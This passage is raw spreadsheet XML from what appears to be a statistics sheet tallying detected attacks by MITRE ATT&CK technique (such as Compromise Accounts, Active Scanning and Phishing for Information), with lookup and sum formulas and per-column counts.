        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>129</v>
      </c>
      <c r="F67" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (129)</v>
      </c>
      <c r="G67" s="292">
        <v>0</v>
      </c>
      <c r="H67" s="322">
        <v>0</v>
      </c>
      <c r="I67" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J67" s="12">
        <v>0</v>
      </c>
      <c r="K67" s="13">
        <v>0</v>
      </c>
      <c r="L67" s="394">
        <v>0</v>
      </c>
      <c r="M67" s="322">
        <v>0</v>
      </c>
      <c r="N67" s="322">
        <v>0</v>
      </c>
      <c r="O67" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P67" s="12">
        <v>0</v>
      </c>
      <c r="Q67" s="13">
        <v>0</v>
      </c>
      <c r="R67" s="394">
        <v>0</v>
      </c>
      <c r="S67" s="409">
        <v>0</v>
      </c>
      <c r="T67" s="4">
        <v>0</v>
      </c>
      <c r="U67" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V67" s="4">
        <v>0</v>
      </c>
      <c r="W67" s="13">
        <v>0</v>
      </c>
      <c r="X67" s="394">
        <v>0</v>
      </c>
      <c r="Y67" s="392">
        <v>0</v>
      </c>
      <c r="Z67" s="392">
        <v>0</v>
      </c>
      <c r="AA67" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB67" s="392">
        <v>0</v>
      </c>
      <c r="AC67" s="16">
        <v>0</v>
      </c>
      <c r="AD67" s="394">
        <v>0</v>
      </c>
      <c r="AE67" s="392">
        <v>0</v>
      </c>
      <c r="AF67" s="392">
        <v>0</v>
      </c>
      <c r="AG67" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH67" s="392">
        <v>0</v>
      </c>
      <c r="AI67" s="16">
        <v>0</v>
      </c>
      <c r="AJ67" s="394">
        <v>0</v>
      </c>
      <c r="AK67" s="392">
        <v>0</v>
      </c>
      <c r="AL67" s="392">
        <v>0</v>
      </c>
      <c r="AM67" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN67" s="392">
        <v>0</v>
      </c>
      <c r="AO67" s="16">
        <v>0</v>
      </c>
      <c r="AP67" s="394">
        <v>0</v>
      </c>
      <c r="AQ67" s="292">
        <v>0</v>
      </c>
      <c r="AR67" s="322">
        <v>0</v>
      </c>
      <c r="AS67" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT67" s="12">
        <v>0</v>
      </c>
      <c r="AU67" s="13">
        <v>0</v>
      </c>
      <c r="AV67" s="394">
        <v>0</v>
      </c>
      <c r="AW67" s="392">
        <v>0</v>
      </c>
      <c r="AX67" s="392">
        <v>0</v>
      </c>
      <c r="AY67" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ67" s="4">
        <v>0</v>
      </c>
      <c r="BA67" s="16">
        <v>0</v>
      </c>
      <c r="BB67" s="394">
        <v>0</v>
      </c>
      <c r="BC67" s="292">
        <v>0</v>
      </c>
      <c r="BD67" s="322">
        <v>0</v>
      </c>
      <c r="BE67" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF67" s="12">
        <v>0</v>
      </c>
      <c r="BG67" s="13">
        <v>0</v>
      </c>
      <c r="BH67" s="394">
        <v>0</v>
      </c>
      <c r="BI67" s="292">
        <v>0</v>
      </c>
      <c r="BJ67" s="322">
        <v>0</v>
      </c>
      <c r="BK67" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL67" s="12">
        <v>0</v>
      </c>
      <c r="BM67" s="13">
        <v>0</v>
      </c>
      <c r="BN67" s="394">
        <v>0</v>
      </c>
      <c r="BO67" s="292">
        <v>0</v>
      </c>
      <c r="BP67" s="322">
        <v>0</v>
      </c>
      <c r="BQ67" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR67" s="12">
        <v>0</v>
      </c>
      <c r="BS67" s="12">
        <v>0</v>
      </c>
      <c r="BT67" s="13">
        <v>0</v>
      </c>
      <c r="BU67" s="394">
        <v>0</v>
      </c>
      <c r="BV67" s="292">
        <v>0</v>
      </c>
      <c r="BW67" s="322">
        <v>0</v>
      </c>
      <c r="BX67" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY67" s="12">
        <v>0</v>
      </c>
      <c r="BZ67" s="13">
        <v>0</v>
      </c>
      <c r="CA67" s="394">
        <v>0</v>
      </c>
      <c r="CB67" s="292">
        <v>135</v>
      </c>
      <c r="CC67" s="322">
        <v>124</v>
      </c>
      <c r="CD67" s="322" t="str">
        <f t="shared" si="12"/>
        <v>124 (135)</v>
      </c>
      <c r="CE67" s="12">
        <v>0</v>
      </c>
      <c r="CF67" s="12">
        <v>1</v>
      </c>
      <c r="CG67" s="13">
        <v>1</v>
      </c>
      <c r="CH67" s="394">
        <v>124</v>
      </c>
    </row>
    <row r="68" spans="1:98" ht="15" customHeight="1">
      <c r="A68" s="4">
        <f t="shared" si="13"/>
        <v>66</v>
      </c>
      <c r="B68" s="4" t="str">
        <f>IFERROR(VLOOKUP(A68,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1586</v>
      </c>
      <c r="C68" s="4" t="str">
        <f>IFERROR(VLOOKUP(B68,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Compromise Accounts</v>
      </c>
      <c r="D68" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B68)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6951</v>
      </c>
      <c r="F68" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (6951)</v>
      </c>
      <c r="G68" s="292">
        <v>0</v>
      </c>
      <c r="H68" s="322">
        <v>0</v>
      </c>
      <c r="I68" s="322" t="str">
        <f t="shared" ref="I68:I78" si="15">H68 &amp; " (" &amp; G68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="J68" s="12">
        <v>0</v>
      </c>
      <c r="K68" s="13">
        <v>0</v>
      </c>
      <c r="L68" s="394">
        <v>0</v>
      </c>
      <c r="M68" s="322">
        <v>457</v>
      </c>
      <c r="N68" s="322">
        <v>306</v>
      </c>
      <c r="O68" s="322" t="str">
        <f t="shared" ref="O68:O78" si="16">N68 &amp; " (" &amp; M68 &amp; ")"</f>
        <v>306 (457)</v>
      </c>
      <c r="P68" s="12">
        <v>3</v>
      </c>
      <c r="Q68" s="13">
        <v>1</v>
      </c>
      <c r="R68" s="394">
        <v>306</v>
      </c>
      <c r="S68" s="409">
        <v>457</v>
      </c>
      <c r="T68" s="4">
        <v>306</v>
      </c>
      <c r="U68" s="322" t="str">
        <f t="shared" ref="U68:U78" si="17">T68 &amp; " (" &amp; S68 &amp; ")"</f>
        <v>306 (457)</v>
      </c>
      <c r="V68" s="4">
        <v>3</v>
      </c>
      <c r="W68" s="13">
        <v>1</v>
      </c>
      <c r="X68" s="394">
        <v>306</v>
      </c>
      <c r="Y68" s="392">
        <v>314527</v>
      </c>
      <c r="Z68" s="392">
        <v>3588</v>
      </c>
      <c r="AA68" s="322" t="str">
        <f t="shared" ref="AA68:AA78" si="18">Z68 &amp; " (" &amp; Y68 &amp; ")"</f>
        <v>3588 (314527)</v>
      </c>
      <c r="AB68" s="392">
        <v>8</v>
      </c>
      <c r="AC68" s="16">
        <v>1</v>
      </c>
      <c r="AD68" s="394">
        <v>3110</v>
      </c>
      <c r="AE68" s="392">
        <v>639</v>
      </c>
      <c r="AF68" s="392">
        <v>488</v>
      </c>
      <c r="AG68" s="322" t="str">
        <f t="shared" ref="AG68:AG78" si="19">AF68 &amp; " (" &amp; AE68 &amp; ")"</f>
        <v>488 (639)</v>
      </c>
      <c r="AH68" s="392">
        <v>6</v>
      </c>
      <c r="AI68" s="16">
        <v>1</v>
      </c>
      <c r="AJ68" s="394">
        <v>485</v>
      </c>
      <c r="AK68" s="392">
        <v>315166</v>
      </c>
      <c r="AL68" s="392">
        <v>4076</v>
      </c>
      <c r="AM68" s="322" t="str">
        <f t="shared" ref="AM68:AM78" si="20">AL68 &amp; " (" &amp; AK68 &amp; ")"</f>
        <v>4076 (315166)</v>
      </c>
      <c r="AN68" s="392">
        <v>14</v>
      </c>
      <c r="AO68" s="16">
        <v>1</v>
      </c>
      <c r="AP68" s="394">
        <v>3379</v>
      </c>
      <c r="AQ68" s="292">
        <v>0</v>
      </c>
      <c r="AR68" s="322">
        <v>0</v>
      </c>
      <c r="AS68" s="322" t="str">
        <f t="shared" ref="AS68:AS78" si="21">AR68 &amp; " (" &amp; AQ68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT68" s="12">
        <v>0</v>
      </c>
      <c r="AU68" s="13">
        <v>0</v>
      </c>
      <c r="AV68" s="394">
        <v>0</v>
      </c>
      <c r="AW68" s="392">
        <v>1065</v>
      </c>
      <c r="AX68" s="392">
        <v>914</v>
      </c>
      <c r="AY68" s="322" t="str">
        <f t="shared" ref="AY68:AY78" si="22">AX68 &amp; " (" &amp; AW68 &amp; ")"</f>
        <v>914 (1065)</v>
      </c>
      <c r="AZ68" s="4">
        <v>7</v>
      </c>
      <c r="BA68" s="16">
        <v>1</v>
      </c>
      <c r="BB68" s="394">
        <v>628</v>
      </c>
      <c r="BC68" s="292">
        <v>1522</v>
      </c>
      <c r="BD68" s="322">
        <v>1220</v>
      </c>
      <c r="BE68" s="322" t="str">
        <f t="shared" ref="BE68:BE78" si="23">BD68 &amp; " (" &amp; BC68 &amp; ")"</f>
        <v>1220 (1522)</v>
      </c>
      <c r="BF68" s="12">
        <v>10</v>
      </c>
      <c r="BG68" s="13">
        <v>1</v>
      </c>
      <c r="BH68" s="394">
        <v>628</v>
      </c>
      <c r="BI68" s="292">
        <v>0</v>
      </c>
      <c r="BJ68" s="322">
        <v>0</v>
      </c>
      <c r="BK68" s="322" t="str">
        <f t="shared" ref="BK68:BK78" si="24">BJ68 &amp; " (" &amp; BI68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL68" s="12">
        <v>0</v>
      </c>
      <c r="BM68" s="13">
        <v>0</v>
      </c>
      <c r="BN68" s="394">
        <v>0</v>
      </c>
      <c r="BO68" s="292">
        <v>1</v>
      </c>
      <c r="BP68" s="322">
        <v>1</v>
      </c>
      <c r="BQ68" s="322" t="str">
        <f t="shared" ref="BQ68:BQ78" si="25">BP68 &amp; " (" &amp; BO68 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BR68" s="12">
        <v>0</v>
      </c>
      <c r="BS68" s="12">
        <v>1</v>
      </c>
      <c r="BT68" s="13">
        <v>1</v>
      </c>
      <c r="BU68" s="394">
        <v>1</v>
      </c>
      <c r="BV68" s="292">
        <v>0</v>
      </c>
      <c r="BW68" s="322">
        <v>0</v>
      </c>
      <c r="BX68" s="322" t="str">
        <f t="shared" ref="BX68:BX78" si="26">BW68 &amp; " (" &amp; BV68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY68" s="12">
        <v>0</v>
      </c>
      <c r="BZ68" s="13">
        <v>0</v>
      </c>
      <c r="CA68" s="394">
        <v>0</v>
      </c>
      <c r="CB68" s="292">
        <v>696786</v>
      </c>
      <c r="CC68" s="322">
        <v>6941</v>
      </c>
      <c r="CD68" s="322" t="str">
        <f t="shared" ref="CD68:CD78" si="27">CC68 &amp; " (" &amp; CB68 &amp; ")"</f>
        <v>6941 (696786)</v>
      </c>
      <c r="CE68" s="12">
        <v>0</v>
      </c>
      <c r="CF68" s="12">
        <v>1</v>
      </c>
      <c r="CG68" s="13">
        <v>1</v>
      </c>
      <c r="CH68" s="394">
        <v>6941</v>
      </c>
    </row>
    <row r="69" spans="1:98" ht="15" customHeight="1">
      <c r="A69" s="4">
        <f t="shared" ref="A69:A78" si="28">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4" t="str">
        <f>IFERROR(VLOOKUP(A69,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1589</v>
      </c>
      <c r="C69" s="4" t="str">
        <f>IFERROR(VLOOKUP(B69,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Gather Victim Identity Information</v>
      </c>
      <c r="D69" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B69)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F69" s="286" t="str">
        <f t="shared" ref="F69:F78" si="29">D69&amp;" ("&amp;E69&amp;")"</f>
        <v>1 (7)</v>
      </c>
      <c r="G69" s="292">
        <v>0</v>
      </c>
      <c r="H69" s="322">
        <v>0</v>
      </c>
      <c r="I69" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J69" s="12">
        <v>0</v>
      </c>
      <c r="K69" s="13">
        <v>0</v>
      </c>
      <c r="L69" s="394">
        <v>0</v>
      </c>
      <c r="M69" s="322">
        <v>0</v>
      </c>
      <c r="N69" s="322">
        <v>0</v>
      </c>
      <c r="O69" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P69" s="12">
        <v>0</v>
      </c>
      <c r="Q69" s="13">
        <v>0</v>
      </c>
      <c r="R69" s="394">
        <v>0</v>
      </c>
      <c r="S69" s="409">
        <v>0</v>
      </c>
      <c r="T69" s="4">
        <v>0</v>
      </c>
      <c r="U69" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V69" s="4">
        <v>0</v>
      </c>
      <c r="W69" s="13">
        <v>0</v>
      </c>
      <c r="X69" s="394">
        <v>0</v>
      </c>
      <c r="Y69" s="392">
        <v>0</v>
      </c>
      <c r="Z69" s="392">
        <v>0</v>
      </c>
      <c r="AA69" s="322" t="str">
        <f t="shared" si="18"/>
        <v>0 (0)</v>
      </c>
      <c r="AB69" s="392">
        <v>0</v>
      </c>
      <c r="AC69" s="16">
        <v>0</v>
      </c>
      <c r="AD69" s="394">
        <v>0</v>
      </c>
      <c r="AE69" s="392">
        <v>0</v>
      </c>
      <c r="AF69" s="392">
        <v>0</v>
      </c>
      <c r="AG69" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH69" s="392">
        <v>0</v>
      </c>
      <c r="AI69" s="16">
        <v>0</v>
      </c>
      <c r="AJ69" s="394">
        <v>0</v>
      </c>
      <c r="AK69" s="392">
        <v>0</v>
      </c>
      <c r="AL69" s="392">
        <v>0</v>
      </c>
      <c r="AM69" s="322" t="str">
        <f t="shared" si="20"/>
        <v>0 (0)</v>
      </c>
      <c r="AN69" s="392">
        <v>0</v>
      </c>
      <c r="AO69" s="16">
        <v>0</v>
      </c>
      <c r="AP69" s="394">
        <v>0</v>
      </c>
      <c r="AQ69" s="292">
        <v>0</v>
      </c>
      <c r="AR69" s="322">
        <v>0</v>
      </c>
      <c r="AS69" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT69" s="12">
        <v>0</v>
      </c>
      <c r="AU69" s="13">
        <v>0</v>
      </c>
      <c r="AV69" s="394">
        <v>0</v>
      </c>
      <c r="AW69" s="392">
        <v>0</v>
      </c>
      <c r="AX69" s="392">
        <v>0</v>
      </c>
      <c r="AY69" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ69" s="4">
        <v>0</v>
      </c>
      <c r="BA69" s="16">
        <v>0</v>
      </c>
      <c r="BB69" s="394">
        <v>0</v>
      </c>
      <c r="BC69" s="292">
        <v>0</v>
      </c>
      <c r="BD69" s="322">
        <v>0</v>
      </c>
      <c r="BE69" s="322" t="str">
        <f t="shared" si="23"/>
        <v>0 (0)</v>
      </c>
      <c r="BF69" s="12">
        <v>0</v>
      </c>
      <c r="BG69" s="13">
        <v>0</v>
      </c>
      <c r="BH69" s="394">
        <v>0</v>
      </c>
      <c r="BI69" s="292">
        <v>0</v>
      </c>
      <c r="BJ69" s="322">
        <v>0</v>
      </c>
      <c r="BK69" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL69" s="12">
        <v>0</v>
      </c>
      <c r="BM69" s="13">
        <v>0</v>
      </c>
      <c r="BN69" s="394">
        <v>0</v>
      </c>
      <c r="BO69" s="292">
        <v>0</v>
      </c>
      <c r="BP69" s="322">
        <v>0</v>
      </c>
      <c r="BQ69" s="322" t="str">
        <f t="shared" si="25"/>
        <v>0 (0)</v>
      </c>
      <c r="BR69" s="12">
        <v>0</v>
      </c>
      <c r="BS69" s="12">
        <v>0</v>
      </c>
      <c r="BT69" s="13">
        <v>0</v>
      </c>
      <c r="BU69" s="394">
        <v>0</v>
      </c>
      <c r="BV69" s="292">
        <v>0</v>
      </c>
      <c r="BW69" s="322">
        <v>0</v>
      </c>
      <c r="BX69" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY69" s="12">
        <v>0</v>
      </c>
      <c r="BZ69" s="13">
        <v>0</v>
      </c>
      <c r="CA69" s="394">
        <v>0</v>
      </c>
      <c r="CB69" s="292">
        <v>0</v>
      </c>
      <c r="CC69" s="322">
        <v>0</v>
      </c>
      <c r="CD69" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE69" s="12">
        <v>0</v>
      </c>
      <c r="CF69" s="12">
        <v>0</v>
      </c>
      <c r="CG69" s="13">
        <v>0</v>
      </c>
      <c r="CH69" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:98" ht="15" customHeight="1">
      <c r="A70" s="4">
        <f t="shared" si="28"/>
        <v>68</v>
      </c>
      <c r="B70" s="4" t="str">
        <f>IFERROR(VLOOKUP(A70,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1595</v>
      </c>
      <c r="C70" s="4" t="str">
        <f>IFERROR(VLOOKUP(B70,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Active Scanning</v>
      </c>
      <c r="D70" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B70)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2574</v>
      </c>
      <c r="F70" s="286" t="str">
        <f t="shared" si="29"/>
        <v>3 (2574)</v>
      </c>
      <c r="G70" s="292">
        <v>0</v>
      </c>
      <c r="H70" s="322">
        <v>0</v>
      </c>
      <c r="I70" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J70" s="12">
        <v>0</v>
      </c>
      <c r="K70" s="13">
        <v>0</v>
      </c>
      <c r="L70" s="394">
        <v>0</v>
      </c>
      <c r="M70" s="322">
        <v>24</v>
      </c>
      <c r="N70" s="322">
        <v>24</v>
      </c>
      <c r="O70" s="322" t="str">
        <f t="shared" si="16"/>
        <v>24 (24)</v>
      </c>
      <c r="P70" s="12">
        <v>6</v>
      </c>
      <c r="Q70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="R70" s="394">
        <v>14</v>
      </c>
      <c r="S70" s="409">
        <v>24</v>
      </c>
      <c r="T70" s="4">
        <v>24</v>
      </c>
      <c r="U70" s="322" t="str">
        <f t="shared" si="17"/>
        <v>24 (24)</v>
      </c>
      <c r="V70" s="4">
        <v>6</v>
      </c>
      <c r="W70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="X70" s="394">
        <v>14</v>
      </c>
      <c r="Y70" s="392">
        <v>4986</v>
      </c>
      <c r="Z70" s="392">
        <v>631</v>
      </c>
      <c r="AA70" s="322" t="str">
        <f t="shared" si="18"/>
        <v>631 (4986)</v>
      </c>
      <c r="AB70" s="392">
        <v>15</v>
      </c>
      <c r="AC70" s="16">
        <v>1</v>
      </c>
      <c r="AD70" s="394">
        <v>446</v>
      </c>
      <c r="AE70" s="392">
        <v>143</v>
      </c>
      <c r="AF70" s="392">
        <v>142</v>
      </c>
      <c r="AG70" s="322" t="str">
        <f t="shared" si="19"/>
        <v>142 (143)</v>
      </c>
      <c r="AH70" s="392">
        <v>12</v>
      </c>
      <c r="AI70" s="16">
        <v>1</v>
      </c>
      <c r="AJ70" s="394">
        <v>75</v>
      </c>
      <c r="AK70" s="392">
        <v>5129</v>
      </c>
      <c r="AL70" s="392">
        <v>773</v>
      </c>
      <c r="AM70" s="322" t="str">
        <f t="shared" si="20"/>
        <v>773 (5129)</v>
      </c>
      <c r="AN70" s="392">
        <v>27</v>
      </c>
      <c r="AO70" s="16">
        <v>1</v>
      </c>
      <c r="AP70" s="394">
        <v>449</v>
      </c>
      <c r="AQ70" s="292">
        <v>0</v>
      </c>
      <c r="AR70" s="322">
        <v>0</v>
      </c>
      <c r="AS70" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT70" s="12">
        <v>0</v>
      </c>
      <c r="AU70" s="13">
        <v>0</v>
      </c>
      <c r="AV70" s="394">
        <v>0</v>
      </c>
      <c r="AW70" s="392">
        <v>6</v>
      </c>
      <c r="AX70" s="392">
        <v>6</v>
      </c>
      <c r="AY70" s="322" t="str">
        <f t="shared" si="22"/>
        <v>6 (6)</v>
      </c>
      <c r="AZ70" s="4">
        <v>6</v>
      </c>
      <c r="BA70" s="16">
        <v>0.33333333333333331</v>
      </c>
      <c r="BB70" s="394">
        <v>5</v>
      </c>
      <c r="BC70" s="292">
        <v>30</v>
      </c>
      <c r="BD70" s="322">
        <v>30</v>
      </c>
      <c r="BE70" s="322" t="str">
        <f t="shared" si="23"/>
        <v>30 (30)</v>
      </c>
      <c r="BF70" s="12">
        <v>12</v>
      </c>
      <c r="BG70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BH70" s="394">
        <v>17</v>
      </c>
      <c r="BI70" s="292">
        <v>0</v>
      </c>
      <c r="BJ70" s="322">
        <v>0</v>
      </c>
      <c r="BK70" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL70" s="12">
        <v>0</v>
      </c>
      <c r="BM70" s="13">
        <v>0</v>
      </c>
      <c r="BN70" s="394">
        <v>0</v>
      </c>
      <c r="BO70" s="292">
        <v>17</v>
      </c>
      <c r="BP70" s="322">
        <v>13</v>
      </c>
      <c r="BQ70" s="322" t="str">
        <f t="shared" si="25"/>
        <v>13 (17)</v>
      </c>
      <c r="BR70" s="12">
        <v>0</v>
      </c>
      <c r="BS70" s="12">
        <v>10</v>
      </c>
      <c r="BT70" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="BU70" s="394">
        <v>11</v>
      </c>
      <c r="BV70" s="292">
        <v>8</v>
      </c>
      <c r="BW70" s="322">
        <v>8</v>
      </c>
      <c r="BX70" s="322" t="str">
        <f t="shared" si="26"/>
        <v>8 (8)</v>
      </c>
      <c r="BY70" s="12">
        <v>1</v>
      </c>
      <c r="BZ70" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="CA70" s="394">
        <v>8</v>
      </c>
      <c r="CB70" s="292">
        <v>4737</v>
      </c>
      <c r="CC70" s="322">
        <v>442</v>
      </c>
      <c r="CD70" s="322" t="str">
        <f t="shared" si="27"/>
        <v>442 (4737)</v>
      </c>
      <c r="CE70" s="12">
        <v>0</v>
      </c>
      <c r="CF70" s="12">
        <v>2</v>
      </c>
      <c r="CG70" s="13">
        <v>1</v>
      </c>
      <c r="CH70" s="394">
        <v>442</v>
      </c>
    </row>
    <row r="71" spans="1:98" ht="15" customHeight="1">
      <c r="A71" s="4">
        <f t="shared" si="28"/>
        <v>69</v>
      </c>
      <c r="B71" s="4" t="str">
        <f>IFERROR(VLOOKUP(A71,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1598</v>
      </c>
      <c r="C71" s="4" t="str">
        <f>IFERROR(VLOOKUP(B71,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing for Information</v>
      </c>
      <c r="D71" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B71)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>59</v>
      </c>
      <c r="F71" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (59)</v>
      </c>
      <c r="G71" s="292">
        <v>0</v>
      </c>
      <c r="H71" s="322">
        <v>0</v>
      </c>
      <c r="I71" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J71" s="12">
        <v>0</v>
      </c>
      <c r="K71" s="13">
        <v>0</v>
      </c>
      <c r="L71" s="394">
        <v>0</v>
      </c>
      <c r="M71" s="322">
        <v>1</v>
      </c>
      <c r="N71" s="322">
        <v>1</v>
      </c>
      <c r="O71" s="322" t="str">
        <f t="shared" si="16"/>
        <v>1 (1)</v>
      </c>
      <c r="P71" s="12">
        <v>1</v>
      </c>
      <c r="Q71" s="13">
        <v>1</v>
      </c>
      <c r="R71" s="394">
        <v>1</v>
      </c>
      <c r="S71" s="409">
        <v>1</v>
      </c>
      <c r="T71" s="4">
        <v>1</v>
      </c>
      <c r="U71" s="322" t="str">
        <f t="shared" si="17"/>
        <v>1 (1)</v>
      </c>
      <c r="V71" s="4">
        <v>1</v>
      </c>
      <c r="W71" s="13">
        <v>1</v>
      </c>
      <c r="X71" s="394">
        <v>1</v>
      </c>
      <c r="Y71" s="392">
        <v>5</v>
      </c>
      <c r="Z71" s="392">
        <v>5</v>
      </c>
      <c r="AA71" s="322" t="str">
        <f t="shared" si="18"/>
        <v>5 (5)</v>
      </c>
      <c r="AB71" s="392">
        <v>2</v>
      </c>
      <c r="AC71" s="16">
        <v>1</v>
      </c>
      <c r="AD71" s="394">
        <v>5</v>
      </c>
      <c r="AE71" s="392">
        <v>1</v>
      </c>
      <c r="AF71" s="392">
        <v>1</v>
      </c>
      <c r="AG71" s="322" t="str">
        <f t="shared" si="19"/>
        <v>1 (1)</v>
      </c>
      <c r="AH71" s="392">
        <v>1</v>
      </c>
      <c r="AI71" s="16">
        <v>1</v>
      </c>
      <c r="AJ71" s="394">
        <v>1</v>
      </c>
      <c r="AK71" s="392">
        <v>6</v>
      </c>
      <c r="AL71" s="392">
        <v>6</v>
      </c>
      <c r="AM71" s="322" t="str">
        <f t="shared" si="20"/>
        <v>6 (6)</v>
      </c>
      <c r="AN71" s="392">
        <v>3</v>
      </c>
      <c r="AO71" s="16">
        <v>1</v>
      </c>
      <c r="AP71" s="394">
        <v>5</v>
      </c>
      <c r="AQ71" s="292">
        <v>0</v>
      </c>
      <c r="AR71" s="322">
        <v>0</v>
      </c>
      <c r="AS71" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT71" s="12">
        <v>0</v>
      </c>
      <c r="AU71" s="13">
        <v>0</v>
      </c>
      <c r="AV71" s="394">
        <v>0</v>
      </c>
      <c r="AW71" s="392">
        <v>0</v>
      </c>
      <c r="AX71" s="392">
        <v>0</v>
      </c>
      <c r="AY71" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ71" s="4">
        <v>0</v>
      </c>
      <c r="BA71" s="16">
        <v>0</v>
      </c>
      <c r="BB71" s="394">
        <v>0</v>
      </c>
      <c r="BC71" s="292">
        <v>1</v>
      </c>
      <c r="BD71" s="322">
        <v>1</v>
      </c>
      <c r="BE71" s="322" t="str">
        <f t="shared" si="23"/>
        <v>1 (1)</v>
      </c>
      <c r="BF71" s="12">
        <v>1</v>
      </c>
      <c r="BG71" s="13">
        <v>1</v>
      </c>
      <c r="BH71" s="394">
        <v>1</v>
      </c>
      <c r="BI71" s="292">
        <v>0</v>
      </c>
      <c r="BJ71" s="322">
        <v>0</v>
      </c>
      <c r="BK71" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL71" s="12">
        <v>0</v>
      </c>
      <c r="BM71" s="13">
        <v>0</v>
      </c>
      <c r="BN71" s="394">
        <v>0</v>
      </c>
      <c r="BO71" s="292">
        <v>58</v>
      </c>
      <c r="BP71" s="322">
